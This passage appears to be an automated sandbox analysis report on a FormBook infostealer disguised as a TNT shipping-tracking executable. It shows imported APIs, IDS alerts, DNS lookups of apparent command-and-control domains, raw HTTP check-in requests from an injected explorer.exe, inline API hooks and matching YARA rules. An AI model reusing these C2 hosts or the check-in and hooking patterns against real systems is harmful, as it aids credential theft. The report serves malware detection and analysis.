                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                    USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                    GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                    OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishGreat Britain
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-09-25T09:07:05.147039+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949709185.134.245.11380TCP
                                    2024-09-25T09:07:05.147039+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949709185.134.245.11380TCP
                                    2024-09-25T09:07:05.147039+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949709185.134.245.11380TCP
                                    2024-09-25T09:07:45.103010+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949711188.114.96.380TCP
                                    2024-09-25T09:07:45.103010+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949711188.114.96.380TCP
                                    2024-09-25T09:07:45.103010+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949711188.114.96.380TCP
                                    2024-09-25T09:08:26.169273+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949712185.53.179.9380TCP
                                    2024-09-25T09:08:26.169273+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949712185.53.179.9380TCP
                                    2024-09-25T09:08:26.169273+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949712185.53.179.9380TCP
                                    2024-09-25T09:09:48.966168+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949713185.53.179.9280TCP
                                    2024-09-25T09:09:48.966168+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949713185.53.179.9280TCP
                                    2024-09-25T09:09:48.966168+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.949713185.53.179.9280TCP
                                    2024-09-25T09:10:09.459963+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.94971477.37.37.3680TCP
                                    2024-09-25T09:10:09.459963+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.94971477.37.37.3680TCP
                                    2024-09-25T09:10:09.459963+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.94971477.37.37.3680TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 25, 2024 09:07:04.646605968 CEST4970980192.168.2.9185.134.245.113
                                    Sep 25, 2024 09:07:04.651426077 CEST8049709185.134.245.113192.168.2.9
                                    Sep 25, 2024 09:07:04.651509047 CEST4970980192.168.2.9185.134.245.113
                                    Sep 25, 2024 09:07:04.651617050 CEST4970980192.168.2.9185.134.245.113
                                    Sep 25, 2024 09:07:04.656366110 CEST8049709185.134.245.113192.168.2.9
                                    Sep 25, 2024 09:07:05.141782045 CEST4970980192.168.2.9185.134.245.113
                                    Sep 25, 2024 09:07:05.146964073 CEST8049709185.134.245.113192.168.2.9
                                    Sep 25, 2024 09:07:05.147038937 CEST4970980192.168.2.9185.134.245.113
                                    Sep 25, 2024 09:07:44.635466099 CEST4971180192.168.2.9188.114.96.3
                                    Sep 25, 2024 09:07:44.640480042 CEST8049711188.114.96.3192.168.2.9
                                    Sep 25, 2024 09:07:44.640728951 CEST4971180192.168.2.9188.114.96.3
                                    Sep 25, 2024 09:07:44.640832901 CEST4971180192.168.2.9188.114.96.3
                                    Sep 25, 2024 09:07:44.645606995 CEST8049711188.114.96.3192.168.2.9
                                    Sep 25, 2024 09:07:45.102806091 CEST8049711188.114.96.3192.168.2.9
                                    Sep 25, 2024 09:07:45.102946043 CEST8049711188.114.96.3192.168.2.9
                                    Sep 25, 2024 09:07:45.102948904 CEST4971180192.168.2.9188.114.96.3
                                    Sep 25, 2024 09:07:45.103009939 CEST4971180192.168.2.9188.114.96.3
                                    Sep 25, 2024 09:07:45.108177900 CEST8049711188.114.96.3192.168.2.9
                                    Sep 25, 2024 09:08:25.651884079 CEST4971280192.168.2.9185.53.179.93
                                    Sep 25, 2024 09:08:25.658293962 CEST8049712185.53.179.93192.168.2.9
                                    Sep 25, 2024 09:08:25.658368111 CEST4971280192.168.2.9185.53.179.93
                                    Sep 25, 2024 09:08:25.658526897 CEST4971280192.168.2.9185.53.179.93
                                    Sep 25, 2024 09:08:25.663302898 CEST8049712185.53.179.93192.168.2.9
                                    Sep 25, 2024 09:08:26.160193920 CEST4971280192.168.2.9185.53.179.93
                                    Sep 25, 2024 09:08:26.168967962 CEST8049712185.53.179.93192.168.2.9
                                    Sep 25, 2024 09:08:26.169272900 CEST4971280192.168.2.9185.53.179.93
                                    Sep 25, 2024 09:09:48.449800014 CEST4971380192.168.2.9185.53.179.92
                                    Sep 25, 2024 09:09:48.454714060 CEST8049713185.53.179.92192.168.2.9
                                    Sep 25, 2024 09:09:48.454806089 CEST4971380192.168.2.9185.53.179.92
                                    Sep 25, 2024 09:09:48.454982042 CEST4971380192.168.2.9185.53.179.92
                                    Sep 25, 2024 09:09:48.460656881 CEST8049713185.53.179.92192.168.2.9
                                    Sep 25, 2024 09:09:48.957828045 CEST4971380192.168.2.9185.53.179.92
                                    Sep 25, 2024 09:09:48.963973999 CEST8049713185.53.179.92192.168.2.9
                                    Sep 25, 2024 09:09:48.966167927 CEST4971380192.168.2.9185.53.179.92
                                    Sep 25, 2024 09:10:08.953855991 CEST4971480192.168.2.977.37.37.36
                                    Sep 25, 2024 09:10:08.958748102 CEST804971477.37.37.36192.168.2.9
                                    Sep 25, 2024 09:10:08.961994886 CEST4971480192.168.2.977.37.37.36
                                    Sep 25, 2024 09:10:08.961994886 CEST4971480192.168.2.977.37.37.36
                                    Sep 25, 2024 09:10:08.966854095 CEST804971477.37.37.36192.168.2.9
                                    Sep 25, 2024 09:10:09.454644918 CEST4971480192.168.2.977.37.37.36
                                    Sep 25, 2024 09:10:09.459908009 CEST804971477.37.37.36192.168.2.9
                                    Sep 25, 2024 09:10:09.459963083 CEST4971480192.168.2.977.37.37.36

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 25, 2024 09:07:04.627176046 CEST5863853192.168.2.91.1.1.1
                                    Sep 25, 2024 09:07:04.641756058 CEST53586381.1.1.1192.168.2.9
                                    Sep 25, 2024 09:07:24.892429113 CEST5638353192.168.2.91.1.1.1
                                    Sep 25, 2024 09:07:25.024241924 CEST53563831.1.1.1192.168.2.9
                                    Sep 25, 2024 09:07:44.595608950 CEST5857653192.168.2.91.1.1.1
                                    Sep 25, 2024 09:07:44.634740114 CEST53585761.1.1.1192.168.2.9
                                    Sep 25, 2024 09:08:05.026374102 CEST5944553192.168.2.91.1.1.1
                                    Sep 25, 2024 09:08:05.047815084 CEST53594451.1.1.1192.168.2.9
                                    Sep 25, 2024 09:08:25.595447063 CEST5153053192.168.2.91.1.1.1
                                    Sep 25, 2024 09:08:25.650769949 CEST53515301.1.1.1192.168.2.9
                                    Sep 25, 2024 09:08:46.041640043 CEST6315753192.168.2.91.1.1.1
                                    Sep 25, 2024 09:08:46.784660101 CEST53631571.1.1.1192.168.2.9
                                    Sep 25, 2024 09:09:06.848118067 CEST5422153192.168.2.91.1.1.1
                                    Sep 25, 2024 09:09:06.857754946 CEST53542211.1.1.1192.168.2.9
                                    Sep 25, 2024 09:09:27.539417028 CEST5082853192.168.2.91.1.1.1
                                    Sep 25, 2024 09:09:27.631494045 CEST53508281.1.1.1192.168.2.9
                                    Sep 25, 2024 09:09:48.393527985 CEST6133753192.168.2.91.1.1.1
                                    Sep 25, 2024 09:09:48.434760094 CEST53613371.1.1.1192.168.2.9
                                    Sep 25, 2024 09:10:08.893843889 CEST5116353192.168.2.91.1.1.1
                                    Sep 25, 2024 09:10:08.948337078 CEST53511631.1.1.1192.168.2.9
                                    Sep 25, 2024 09:10:32.658777952 CEST5100653192.168.2.91.1.1.1
                                    Sep 25, 2024 09:10:32.675614119 CEST53510061.1.1.1192.168.2.9
                                    Sep 25, 2024 09:10:52.830183029 CEST6504253192.168.2.91.1.1.1
                                    Sep 25, 2024 09:10:53.605676889 CEST53650421.1.1.1192.168.2.9

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 25, 2024 09:07:04.627176046 CEST192.168.2.91.1.1.10xd6d9Standard query (0)www.circusenergy.onlineA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:24.892429113 CEST192.168.2.91.1.1.10x2ceeStandard query (0)www.cyber-eu.digitalA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:44.595608950 CEST192.168.2.91.1.1.10x6534Standard query (0)www.weight-loss-003.todayA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:05.026374102 CEST192.168.2.91.1.1.10xde57Standard query (0)www.xmld101.icuA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:25.595447063 CEST192.168.2.91.1.1.10x957eStandard query (0)www.walk-in-tubs-30303.bondA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:46.041640043 CEST192.168.2.91.1.1.10xbea6Standard query (0)www.r86gd377hi.rentA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:06.848118067 CEST192.168.2.91.1.1.10xbf3dStandard query (0)www.thetrue.oneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:27.539417028 CEST192.168.2.91.1.1.10xc970Standard query (0)www.tvtwenty20sr.topA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:48.393527985 CEST192.168.2.91.1.1.10x26a4Standard query (0)www.pools-80761.bondA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:08.893843889 CEST192.168.2.91.1.1.10x2be0Standard query (0)www.legendhud.shopA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:32.658777952 CEST192.168.2.91.1.1.10xb4d8Standard query (0)www.borghardt.xyzA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:52.830183029 CEST192.168.2.91.1.1.10x3eecStandard query (0)www.slab-leak-repair-74697.bondA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 25, 2024 09:07:04.641756058 CEST1.1.1.1192.168.2.90xd6d9No error (0)www.circusenergy.online185.134.245.113A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:25.024241924 CEST1.1.1.1192.168.2.90x2ceeName error (3)www.cyber-eu.digitalnonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:44.634740114 CEST1.1.1.1192.168.2.90x6534No error (0)www.weight-loss-003.today188.114.96.3A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:07:44.634740114 CEST1.1.1.1192.168.2.90x6534No error (0)www.weight-loss-003.today188.114.97.3A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:05.047815084 CEST1.1.1.1192.168.2.90xde57Name error (3)www.xmld101.icunonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:25.650769949 CEST1.1.1.1192.168.2.90x957eNo error (0)www.walk-in-tubs-30303.bond185.53.179.93A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:08:46.784660101 CEST1.1.1.1192.168.2.90xbea6Name error (3)www.r86gd377hi.rentnonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:06.857754946 CEST1.1.1.1192.168.2.90xbf3dName error (3)www.thetrue.onenonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:27.631494045 CEST1.1.1.1192.168.2.90xc970Name error (3)www.tvtwenty20sr.topnonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:09:48.434760094 CEST1.1.1.1192.168.2.90x26a4No error (0)www.pools-80761.bond185.53.179.92A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:08.948337078 CEST1.1.1.1192.168.2.90x2be0No error (0)www.legendhud.shoplegendhud.shopCNAME (Canonical name)IN (0x0001)false
                                    Sep 25, 2024 09:10:08.948337078 CEST1.1.1.1192.168.2.90x2be0No error (0)legendhud.shop77.37.37.36A (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:32.675614119 CEST1.1.1.1192.168.2.90xb4d8Name error (3)www.borghardt.xyznonenoneA (IP address)IN (0x0001)false
                                    Sep 25, 2024 09:10:53.605676889 CEST1.1.1.1192.168.2.90x3eecName error (3)www.slab-leak-repair-74697.bondnonenoneA (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • www.circusenergy.online
                                    • www.weight-loss-003.today
                                    • www.walk-in-tubs-30303.bond
                                    • www.pools-80761.bond
                                    • www.legendhud.shop

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.949709185.134.245.113803504C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 25, 2024 09:07:04.651617050 CEST171OUTGET /jd21/?Bl=8pSpW470ix&FjUh5xw=yaFk5fMSAGN82SCLgaCn8ag2pJ39IRNZ6T5Hukk791SUyW8vAMaB+rWiLjqwV1W2V2ID HTTP/1.1
                                    Host: www.circusenergy.online
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.949711188.114.96.3803504C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 25, 2024 09:07:44.640832901 CEST173OUTGET /jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp HTTP/1.1
                                    Host: www.weight-loss-003.today
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 25, 2024 09:07:45.102806091 CEST895INHTTP/1.1 301 Moved Permanently
                                    Date: Wed, 25 Sep 2024 07:07:45 GMT
                                    Content-Type: text/html
                                    Content-Length: 167
                                    Connection: close
                                    Cache-Control: max-age=3600
                                    Expires: Wed, 25 Sep 2024 08:07:45 GMT
                                    Location: https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9k5ErdKN47IyNuqHiRjxQkJQdMbI5za5yRbXRCZtCzBTJkpyl24brwU5eYjVvOc64300KOAMQ3qkDk95%2BfrPDdeXZjKasLDeDaGKSIbJhO7cfgIFTy7JIqSxjNGj91Zf0Ps4FdykzXcP6RUC"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8c892dd68f39728a-EWR
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.949712185.53.179.93803504C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 25, 2024 09:08:25.658526897 CEST175OUTGET /jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI HTTP/1.1
                                    Host: www.walk-in-tubs-30303.bond
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.949713185.53.179.92803504C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 25, 2024 09:09:48.454982042 CEST168OUTGET /jd21/?Bl=8pSpW470ix&FjUh5xw=b/Dc4UkLHLZk59X8SmhgJ1uv172ipMqzAxiQNMhexpG5XWQ9Iwkd+tXAg5/cR36jPrSP HTTP/1.1
                                    Host: www.pools-80761.bond
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.94971477.37.37.36803504C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 25, 2024 09:10:08.961994886 CEST166OUTGET /jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix HTTP/1.1
                                    Host: www.legendhud.shop
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:03:06:19
                                    Start date:25/09/2024
                                    Path:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                    Imagebase:0x400000
                                    File size:1'135'963 bytes
                                    MD5 hash:B49EDB762958E81C098B4869BA26A78C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:03:06:27
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
